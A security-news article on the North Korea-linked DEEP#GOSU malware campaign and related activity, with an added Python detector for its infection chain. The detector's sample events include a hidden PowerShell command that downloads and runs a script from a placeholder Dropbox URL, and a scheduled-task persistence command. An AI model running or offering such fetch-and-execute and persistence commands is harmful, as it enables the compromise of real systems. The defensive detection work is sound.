New DEEP#GOSU Malware Campaign Targets Windows Users with Advanced Tactics


A new, elaborate attack campaign has been observed using PowerShell and VBScript malware to infect Windows systems and harvest sensitive information.

Cybersecurity company Securonix, which dubbed the campaign DEEP#GOSU, said it is likely associated with the North Korean state-sponsored group tracked as Kimsuky.

"The malware payloads used in the DEEP#GOSU represent a sophisticated, multi-stage threat designed to operate stealthily on Windows systems, especially from a network-monitoring standpoint," security researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said in a technical analysis shared with The Hacker News.

"Its capabilities included keylogging, clipboard monitoring, dynamic payload execution, and data exfiltration, and persistence using both RAT software for full remote access, scheduled tasks, as well as self-executing PowerShell scripts using jobs."

A notable aspect of the infection chain is that it leverages legitimate services such as Dropbox and Google Docs for command-and-control (C2), allowing the threat actor to blend into regular network traffic and evade detection.

On top of that, using such cloud services to stage the payloads lets the operators update the malware's functionality or deliver additional modules without touching the victim host.

The starting point is said to be a malicious email attachment containing a ZIP archive with a rogue shortcut file (.LNK) that masquerades as a PDF file ("IMG_20240214_0001.pdf.lnk").

The .LNK file comes embedded with a PowerShell script as well as a decoy PDF document; the PowerShell script also reaches out to actor-controlled Dropbox infrastructure to retrieve and execute another PowerShell script ("ps.bin").


The second-stage PowerShell script, for its part, fetches a new file from Dropbox ("r_enc.bin"), a .NET assembly in binary form that is actually an open-source remote access trojan known as TruRat (aka TutRat or C# RAT), with capabilities to record keystrokes, manage files, and facilitate remote control.

It is worth noting that Kimsuky has employed TruRat in at least two campaigns uncovered by the AhnLab Security Intelligence Center (ASEC) last year.

Also retrieved by the PowerShell script from Dropbox is a VBScript ("info_sc.txt"), which, in turn, is designed to run arbitrary VBScript code retrieved from the cloud storage service, including a PowerShell script ("w568232.ps12x").

The VBScript is also designed to use Windows Management Instrumentation (WMI) to execute commands on the system, and to set up scheduled tasks for persistence.


Another noteworthy aspect of the VBScript is its use of Google Docs to dynamically retrieve configuration data for the Dropbox connection, allowing the threat actor to change the account information without having to modify the script itself.

The PowerShell script downloaded as a result is equipped to gather extensive information about the system and exfiltrate the details via a POST request to Dropbox.

"The purpose of this script appears to be designed to serve as a tool for periodic communication with a command-and-control (C2) server via Dropbox," the researchers said. "Its main purposes include encrypting and exfiltrating or downloading data."

In other words, it acts as a backdoor to control the compromised hosts and continuously keep a log of user activity, including keystrokes, clipboard content, and the foreground window.
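The chain described above (a double-extension .LNK, a script host pulling stages from Dropbox, a VBScript saved with a non-script extension, and persistence via a scheduled task) gives defenders several host-level signals that do not depend on the C2 domain being suspicious. The following detector is an added example written for this page, not Securonix's code or anything from the report; the pipe-separated event format, the `//e:vbscript` invocation of the .txt-named VBScript, the Dropbox URL, the hidden-window flag and the `schtasks` arguments are all assumptions, and the sample events are constructed.

```python
"""Added example (not from the Securonix report): rule-based triage of
process-creation and file-creation events for the DEEP#GOSU pattern.

Event format is an assumption for this example:
    kind|parent_image|image_or_path|command_line
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Services the report names as staging/C2 (Dropbox) and config store (Google Docs).
CLOUD_C2_RE = re.compile(r"(dropbox(usercontent)?\.com|docs\.google\.com)", re.I)
# Shortcut posing as a document: a document extension immediately followed by .lnk
DOUBLE_EXT_LNK_RE = re.compile(r"\.(pdf|docx?|xlsx?|hwp)\.lnk$", re.I)
# Normal script-file extensions; a script host run without one is suspicious
SCRIPT_EXT_RE = re.compile(r"\.(vbs|vbe|js|jse|ps1|wsf|hta)(\s|$|\")", re.I)
HIDDEN_WINDOW_RE = re.compile(r"-w(indowstyle)?\s+hidden", re.I)


@dataclass
class Event:
    kind: str      # "process" or "file"
    parent: str    # parent process image (or creating process for file events)
    image: str     # process image, or file path for file events
    cmdline: str   # command line (empty for file events)


def parse_event(line: str) -> Optional[Event]:
    """Split one pipe-separated event line; return None if it is malformed."""
    parts = line.split("|", 3)
    if len(parts) != 4:
        return None
    return Event(*(p.strip() for p in parts))


def classify(ev: Event) -> List[str]:
    """Return the names of every rule the event triggers (order is fixed)."""
    hits: List[str] = []
    image = ev.image.lower().rsplit("\\", 1)[-1]
    parent = ev.parent.lower().rsplit("\\", 1)[-1]

    if ev.kind == "file":
        if DOUBLE_EXT_LNK_RE.search(ev.image):
            hits.append("LNK_DOUBLE_EXTENSION")
        return hits

    # Stage download / C2 over a legitimate cloud service from a script host
    if image in SCRIPT_HOSTS and CLOUD_C2_RE.search(ev.cmdline):
        hits.append("SCRIPT_HOST_CLOUD_C2")
    # VBScript delivered under a non-script name (info_sc.txt in the report)
    if image in {"wscript.exe", "cscript.exe"} and not SCRIPT_EXT_RE.search(ev.cmdline):
        hits.append("SCRIPT_HOST_NONSTANDARD_EXTENSION")
    # Persistence: scheduled task created by a script host rather than an admin
    if image == "schtasks.exe" and "/create" in ev.cmdline.lower() and parent in SCRIPT_HOSTS:
        hits.append("SCHTASKS_FROM_SCRIPT_HOST")
    # A shortcut double-clicked in Explorer launching a hidden script host
    if image in SCRIPT_HOSTS and parent == "explorer.exe" and HIDDEN_WINDOW_RE.search(ev.cmdline):
        hits.append("HIDDEN_SCRIPT_FROM_EXPLORER")
    return hits


def scan(lines: List[str]) -> Dict[int, List[str]]:
    """Map each triggering event's index to the rules it hit."""
    findings: Dict[int, List[str]] = {}
    for i, line in enumerate(lines):
        ev = parse_event(line)
        if ev is not None:
            hits = classify(ev)
            if hits:
                findings[i] = hits
    return findings


# Constructed sample events; only the file names come from the report.
SAMPLE_EVENTS = [
    r"file|explorer.exe|C:\Users\victim\Downloads\IMG_20240214_0001.pdf.lnk|",
    r"process|explorer.exe|powershell.exe|powershell.exe -WindowStyle hidden -ep bypass -c IEX((New-Object Net.WebClient).DownloadString('https://dl.dropboxusercontent.com/s/example/ps.bin'))",
    r"process|powershell.exe|wscript.exe|wscript.exe //e:vbscript C:\Users\victim\AppData\Local\Temp\info_sc.txt",
    r"process|wscript.exe|schtasks.exe|schtasks.exe /create /sc minute /mo 10 /tn SysUpdate /tr wscript.exe C:\Users\victim\AppData\Local\Temp\info_sc.txt /f",
    r"process|explorer.exe|wscript.exe|wscript.exe C:\Scripts\logon.vbs",          # benign
    r"process|cmd.exe|powershell.exe|powershell.exe -NoProfile -c Get-Process",  # benign
]

if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(rules)}")
```

Each rule alone is noisy on a busy fleet; what makes this chain stand out is several of them firing on one host within minutes, so in practice the per-event hits would be correlated by host and time window before alerting.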

The development comes as security researcher Ovi Liber detailed how the North Korea-linked ScarCruft group embeds malicious code within Hangul Word Processor (HWP) lure documents attached to phishing emails to distribute malware such as RokRAT.


"The email contains a HWP Document which has an embedded OLE object in the form of a BAT script," Liber said. "Once the user clicks on the OLE object, the BAT script executes which in turn creates a PowerShell-based reflective DLL injection attack on the victim's machine."

It also follows Andariel's abuse of a legitimate remote desktop solution called MeshAgent to install malware such as AndarLoader and ModeLoader, a JavaScript malware meant for command execution.

"This is the first confirmed use of a MeshAgent by the Andariel group," ASEC said. "The Andariel Group has been continuously abusing the asset management solutions of domestic companies to distribute malware in the process of lateral movement, starting with Innorix Agent in the past."


Andariel, also known by the names Nickel Hyatt and Silent Chollima, is a sub-cluster of the notorious Lazarus Group, actively orchestrating attacks for both cyber espionage and financial gain.

The prolific state-sponsored threat actor has since been observed laundering a chunk of the crypto assets stolen in the hack of crypto exchange HTX and its cross-chain bridge (aka HECO Bridge) through Tornado Cash. The breach led to the theft of $112.5 million in cryptocurrency in November 2023.

"Following common crypto-laundering patterns, the stolen tokens were immediately swapped for ETH, using decentralized exchanges," Elliptic said. "The stolen funds then lay dormant until March 13, 2024, when the stolen crypto assets began to be sent through Tornado Cash."

The blockchain analytics firm said that Tornado Cash's continued operation despite sanctions has likely made it an attractive option for the Lazarus Group to obscure its transaction trail following the shutdown of Sinbad in November 2023.

"The mixer operates through smart contracts running on decentralized blockchains, so it can't be seized and shut down in the same way that centralized mixers such as have been," it noted.
